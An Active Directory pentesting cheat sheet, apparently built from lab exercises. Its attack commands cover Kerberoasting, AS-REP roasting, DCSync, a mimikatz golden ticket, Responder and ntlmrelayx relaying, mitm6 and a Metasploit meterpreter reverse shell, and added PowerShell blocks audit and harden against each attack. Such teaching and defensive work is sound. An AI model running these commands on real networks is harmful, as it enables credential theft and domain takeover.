Basic AD Pentesting

AD Components

Domain Controller

  • Server with AD DS server role.

  • Hosts a copy of the AD DS directory store.

  • Provides authentication and authorization services.

  • Replicates updates to other domain controllers.

  • Allows administrative access to manage resources.

AD DS Data Store

  • Consists of the Ntds.dit file (password hashes, sensitive information).

  • Stored in the %SystemRoot%\NTDS folder on all domain controllers.

AD Logical Components

  • Schema:

    • Defines objects that can be stored in the directory.

    • Enforces rules about object creation and configuration.

  • Domains:

    • Group and manage objects in an organization.

    • May include child domains and trusts with other domains.

  • Trees:

    • Hierarchy of domains in AD DS that share a contiguous DNS namespace.

    • Can have child domains.

    • Every parent/child pair in a tree is linked by a two-way transitive trust.

  • Forests:

    • Collection of Trees.

    • Shares common schema and configuration.

    • Enables trusts between domains in the forest.

    • Shares enterprise admin, schema admins groups.

  • Organizational Units (OUs):

    • Containers that can contain users, groups, computers, and other OUs.

  • Trusts:

    • The mechanism by which users in one domain are granted access to resources in another domain or forest.

  • Objects:

    • Users, contacts, groups, computers, printers, shared folders, etc.

Initial Attack Vectors

  • Begin with mitm6 or Responder.

  • Run a scan to generate traffic.

  • Look for default credentials on web logins.

  • Target websites in scope (e.g. the Metasploit http_version scanner to fingerprint them).

  • Consider printers, Jenkins, etc.

  • Think outside the box.


Enumeration

Kerberos Enumeration

  1. Nmap Scan:

    nmap -T5 10.10.10.100
  2. SMB Enumeration:

    smbclient -L \\\\10.10.10.100\\
  3. Replication:

    smbclient \\\\10.10.10.100\\Replication
    • In the Replication directory, look for Groups.xml file.

  4. Extracting cPassword:

    • Copy the cPassword attribute from Groups.xml.

    • Use gpp-decrypt to decrypt the password:

      gpp-decrypt <cpassword>
  5. Psexec.py with the recovered credential:

    psexec.py active.htb/svc_tgs:<decrypted_password>@10.10.10.100
  6. Kerberoasting with GetUserSPNs.py:

    python3 GetUserSPNs.py limbawy.local/ahmed:Password -dc-ip 192.168.1.10 -request
    • Save the hash to TGS.txt.

    • Crack the hash using john:

      sudo john TGS.txt
  7. ASREPRoast with GetNPUsers.py (the -no-pass flag requests the AS-REP without pre-authentication instead of prompting for a password):

    python3 GetNPUsers.py limbawy.local/levi -dc-ip 192.168.1.10 -no-pass
    • Save the hash to TGT.txt.

    • Crack the hash using john:

      sudo john TGT.txt
  8. BloodHound for Full Control:

    bloodhound-python -u Levi -p Password -ns 192.168.1.10 -d limbawy.local -c All
  9. DC Sync Attack with secretsdump.py:

    python3 secretsdump.py limbawy.local/Levi:Password@192.168.1.10 -use-vss
  10. Golden Ticket with mimikatz (module and command are separated by a double colon; the krbtgt NT hash is passed with /krbtgt):

    mimikatz # kerberos::golden /domain:limbawy.local /sid:S-1-5-21-1314916712-2918817657-636196047 /user:Administrator /krbtgt:b3a2e1bb5cb5e94a27f1884d86bca6c2 /ptt
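The steps above only work because of a handful of domain-side weaknesses: a cpassword left in SYSVOL, accounts without Kerberos pre-authentication, user accounts carrying SPNs that still accept RC4, principals with replication rights, and a krbtgt password that is never rotated. The following is an added example (not code from the original page) that audits each of those from the defender's side. It assumes the RSAT ActiveDirectory module on a domain-joined, privileged host; nothing is hard-coded to a domain, and the well-known replication right GUIDs are the standard AD values.

```powershell
# Added example (not from the original page): defender-side audit of the
# exposures the enumeration steps above rely on. Assumes the RSAT
# ActiveDirectory module on a domain-joined admin host.
Import-Module ActiveDirectory

$domain = Get-ADDomain
$sysvol = "\\$($domain.DNSRoot)\SYSVOL\$($domain.DNSRoot)\Policies"

# 1. Group Policy Preference passwords: any XML under SYSVOL that still
#    carries a cpassword attribute is recoverable by anyone who can read SYSVOL.
$gpp = Get-ChildItem -Path $sysvol -Recurse -Filter *.xml -ErrorAction SilentlyContinue |
    Select-String -Pattern 'cpassword=' -SimpleMatch |
    Select-Object -ExpandProperty Path -Unique

# 2. AS-REP roastable accounts: pre-authentication disabled on an enabled user.
$noPreAuth = Get-ADUser -Filter { DoesNotRequirePreAuth -eq $true -and Enabled -eq $true } |
    Select-Object -ExpandProperty SamAccountName

# 3. Kerberoastable accounts: enabled user objects (not computers) with an SPN.
#    msDS-SupportedEncryptionTypes bits: 0x4 = RC4, 0x8 = AES128, 0x10 = AES256.
#    An unset attribute or an RC4 bit means the TGS can be issued with RC4,
#    which is the cheap-to-crack case in step 6.
$spnUsers = Get-ADUser -Filter { ServicePrincipalName -like '*' -and Enabled -eq $true } `
        -Properties ServicePrincipalName, 'msDS-SupportedEncryptionTypes' |
    Where-Object { $_.SamAccountName -ne 'krbtgt' } |
    ForEach-Object {
        $enc = $_.'msDS-SupportedEncryptionTypes'
        [pscustomobject]@{
            Account = $_.SamAccountName
            SPNs    = ($_.ServicePrincipalName -join ';')
            AESOnly = ($null -ne $enc) -and (($enc -band 0x18) -ne 0) -and (($enc -band 0x4) -eq 0)
        }
    }

# 4. DCSync rights: who holds DS-Replication-Get-Changes(-All) on the domain
#    head. Anything beyond Domain Controllers, Enterprise Domain Controllers,
#    SYSTEM and the admin groups can run step 9 (secretsdump.py) remotely.
$replGuids = @('1131f6aa-9c07-11d1-f79f-00c04fc2dcd2',   # DS-Replication-Get-Changes
               '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2')   # DS-Replication-Get-Changes-All
$dcsync = (Get-Acl -Path "AD:\$($domain.DistinguishedName)").Access |
    Where-Object { $_.AccessControlType -eq 'Allow' -and $_.ObjectType.ToString() -in $replGuids } |
    Select-Object -ExpandProperty IdentityReference -Unique

# 5. krbtgt age: a golden ticket (step 10) stays valid until the krbtgt
#    password has been rotated twice, so a stale PasswordLastSet is the finding.
$krbtgt = Get-ADUser -Identity krbtgt -Properties PasswordLastSet
$krbtgtAgeDays = ((Get-Date) - $krbtgt.PasswordLastSet).Days

[pscustomobject]@{
    GppFilesWithCpassword = $gpp
    NoPreAuthUsers        = $noPreAuth
    KerberoastableUsers   = $spnUsers
    DcSyncPrincipals      = $dcsync
    KrbtgtPasswordAgeDays = $krbtgtAgeDays
} | Format-List
```

Each non-empty list maps directly to one of the enumeration steps: GPP hits to step 4, NoPreAuthUsers to step 7, KerberoastableUsers with AESOnly false to step 6, unexpected DcSyncPrincipals to step 9, and a krbtgt age in the hundreds of days to step 10.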

LLMNR

  • LLMNR (Link-Local Multicast Name Resolution) Attack Workflow:

    1. Use responder:

      responder -I tun0 -rdw
    2. Wait for events.

    3. Retrieve hashes.

    4. Crack hashes using hashcat:

      hashcat -m 5600 hashes.txt rockyou.txt
  • Defense:

    • Disable LLMNR and NBT-NS.

    • Enforce strong user passwords.
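Responder only gets a hash because the victim host falls back to multicast (LLMNR) or broadcast (NBT-NS) name resolution when DNS fails. The following is an added example, not code from the original page, showing the per-host equivalent of the two "Defense" items above on Windows; it assumes an elevated PowerShell session and uses the same registry values the "Turn off multicast name resolution" policy and the NetBIOS adapter setting write.

```powershell
# Added example (not from the original page): disable LLMNR and NBT-NS on a
# Windows host. Run elevated. In a domain these are normally pushed by GPO;
# this is the per-host equivalent of that policy.

# 1. LLMNR off. The DNSClient policy key may not exist yet, so create it.
$dnsPolicy = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient'
New-Item -Path $dnsPolicy -Force | Out-Null
Set-ItemProperty -Path $dnsPolicy -Name 'EnableMulticast' -Value 0 -Type DWord

# 2. NBT-NS off on every interface. NetbiosOptions 2 = disable NetBIOS over TCP/IP.
$nbtIfaces = 'HKLM:\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces'
Get-ChildItem -Path $nbtIfaces | ForEach-Object {
    Set-ItemProperty -Path $_.PSPath -Name 'NetbiosOptions' -Value 2 -Type DWord
}

# 3. Verify. The NBT-NS change takes effect after the adapter is reset or the
#    host reboots; until then, poisoning of NBT-NS queries is still possible.
$llmnrOk = (Get-ItemProperty -Path $dnsPolicy -Name 'EnableMulticast').EnableMulticast -eq 0
$nbtOk = -not (Get-ChildItem -Path $nbtIfaces | Where-Object {
    (Get-ItemProperty -Path $_.PSPath -Name 'NetbiosOptions' -ErrorAction SilentlyContinue).NetbiosOptions -ne 2
})
"LLMNR disabled: $llmnrOk"
"NBT-NS disabled on all interfaces: $nbtOk"
```

The second defense item, strong passwords, is what limits the damage when a hash is captured anyway: an NTLMv2 response for a long passphrase will not fall to the hashcat wordlist run shown above.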

SMB

  1. Identify SMB Signing:

    nmap --script=smb2-security-mode.nse -p 445 192.168.57.0/24
  2. SMB Relay Attack Workflow:

    • Edit responder.conf to turn off SMB and HTTP.

    • Run responder (SMB and HTTP are handled by ntlmrelayx, which is why they are turned off in responder.conf):

      responder -I eth0 -rdw
    • Run ntlmrelayx.py:

      ntlmrelayx.py -tf targets.txt -smb2support
  3. Gaining a Shell using MSF (exploit/windows/smb/psexec; the option names are smbdomain, smbuser and smbpass):

    msfconsole
    search psexec
    use exploit/windows/smb/psexec
    set rhost target_ip
    set smbdomain <domain_here>
    set smbuser <user_here>
    set smbpass <password_u_cracked_here>
    set payload windows/x64/meterpreter/reverse_tcp
    set lhost eth0
    run
  4. Other Ways to Psexec (impacket syntax is domain/user:password@host):

    psexec.py marvel.local/fcastle:password1@192.168.57.141
    smbexec.py marvel.local/fcastle:password1@192.168.57.141
    wmiexec.py marvel.local/fcastle:password1@192.168.57.141
  • Mitigation:

    • Enable SMB Signing.

    • Disable NTLM authentication.

    • Implement account tiering.

    • Restrict local admin access.
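The relay in step 2 succeeds only against hosts where SMB signing is offered but not required (the exact condition the smb2-security-mode scan in step 1 reports). The following is an added example, not code from the original page, applying the first two "Mitigation" items on a Windows host: it requires signing on both the server and client side and tightens NTLM in audit mode first. It assumes an elevated session on Windows 8 / Server 2012 or later (for the SmbShare cmdlets).

```powershell
# Added example (not from the original page): require SMB signing and begin
# restricting NTLM. Run elevated; SmbShare module ships with Windows 8 /
# Server 2012 and later.

# 1. Require signing in both directions. EnableSecuritySignature alone only
#    *offers* signing, which is the "enabled but not required" state nmap
#    reports and the state ntlmrelayx needs on the target.
Set-SmbServerConfiguration -EnableSecuritySignature $true -RequireSecuritySignature $true -Force
Set-SmbClientConfiguration -EnableSecuritySignature $true -RequireSecuritySignature $true -Force

# 2. NTLM. LmCompatibilityLevel 5 = send NTLMv2 only, refuse LM and NTLMv1.
#    Fully blocking incoming NTLM (RestrictReceivingNTLMTraffic = 2) breaks
#    anything still authenticating with NTLM, so switch on auditing first and
#    review event 8004 in Microsoft-Windows-NTLM/Operational before enforcing.
$lsa = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
Set-ItemProperty -Path $lsa -Name 'LmCompatibilityLevel' -Value 5 -Type DWord
Set-ItemProperty -Path "$lsa\MSV1_0" -Name 'AuditReceivingNTLMTraffic' -Value 2 -Type DWord

# 3. Verify: this is the same fact the external nmap check in step 1 reports.
$srv = Get-SmbServerConfiguration
$cli = Get-SmbClientConfiguration
[pscustomobject]@{
    ServerRequiresSigning = $srv.RequireSecuritySignature
    ClientRequiresSigning = $cli.RequireSecuritySignature
    LmCompatibilityLevel  = (Get-ItemProperty -Path $lsa -Name 'LmCompatibilityLevel').LmCompatibilityLevel
}
```

Account tiering and restricting local admin, the remaining two items, are what stop a single relayed workstation credential from being reusable on every other host in targets.txt.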

IPv6 Attacks

  1. Install mitm6:

    pip3 install mitm6
  2. Lab setup for the LDAPS relay target (the DC must offer LDAPS, which needs a certificate):

    • Go to Server Manager.

    • Add the Active Directory Certificate Services role.

  3. DNS Takeover via mitm6 Workflow:

    mitm6 -d marvel.local
  4. Relay the captured authentication to LDAPS with ntlmrelayx.py (the -l option dumps domain information into the lootme directory):

    ntlmrelayx.py -t ldaps://192.168.57.140 -wh fakewpad.marvel.local -l lootme
  • Mitigation:

    • Disable IPv6.

    • Disable WPAD.

    • Enable LDAP signing.

    • Place administrative users in the Protected Users group.
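mitm6 chains three things: hosts accepting a rogue IPv6 DNS server, clients looking up WPAD, and a DC that accepts unsigned or unbound LDAP from a relayed NTLM session. The following is an added example, not code from the original page, that applies the four "Mitigation" items above. The LDAP values belong on each domain controller, the WPAD and IPv6 values on every host, and the Protected Users change is a one-off AD change; it assumes an elevated session with the RSAT ActiveDirectory module, and the admin account name is a placeholder.

```powershell
# Added example (not from the original page): the four mitigation items.
# Run elevated. ADMIN-ACCOUNT-PLACEHOLDER is a placeholder, not a real account.

# 1. DC side: require LDAP signing and LDAPS channel binding, so a relayed
#    NTLM session to ldap:// or ldaps:// (the ntlmrelayx step above) is refused.
$ntds = 'HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters'
Set-ItemProperty -Path $ntds -Name 'LDAPServerIntegrity'       -Value 2 -Type DWord   # 2 = require signing
Set-ItemProperty -Path $ntds -Name 'LdapEnforceChannelBinding' -Value 2 -Type DWord   # 2 = always

# 2. Protected Users: members cannot authenticate with NTLM, cannot use RC4
#    Kerberos keys and cannot be delegated. Never add service accounts or the
#    only break-glass admin; test with one account first.
Import-Module ActiveDirectory
$tier0 = @('ADMIN-ACCOUNT-PLACEHOLDER')   # placeholder: real admin sAMAccountNames go here
Add-ADGroupMember -Identity 'Protected Users' -Members $tier0

# 3. WPAD: stop the auto-proxy service (the services console greys it out on
#    recent Windows, so set the Start value directly; 4 = disabled) and turn
#    off automatic proxy detection for the current user.
Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\WinHttpAutoProxySvc' -Name 'Start' -Value 4 -Type DWord
Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings' -Name 'AutoDetect' -Value 0 -Type DWord

# 4. IPv6: when it is genuinely unused, 0xFF disables it on all non-loopback
#    interfaces (reboot required). mitm6 works because hosts accept rogue
#    router advertisements and DHCPv6 replies, so RA guard / DHCPv6 guard at
#    the switch is the alternative when IPv6 must stay on.
Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters' -Name 'DisabledComponents' -Value 0xFF -Type DWord

# Verify the DC-side values and the group membership.
Get-ItemProperty -Path $ntds | Select-Object LDAPServerIntegrity, LdapEnforceChannelBinding
Get-ADGroupMember -Identity 'Protected Users' | Select-Object SamAccountName
```

Of the four, LDAP signing and channel binding are the ones that break the relay itself; the other three remove the ways the attacker obtains an authentication to relay in the first place.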

Passback Attack

Additional Resources:

  • Top Five Ways I Got Domain Admin on Your Internal Network Before Lunch (2018 Edition)

  • The worst of both worlds: Combining NTLM Relaying and Kerberos delegation

  • How to Hack Through a Pass-back Attack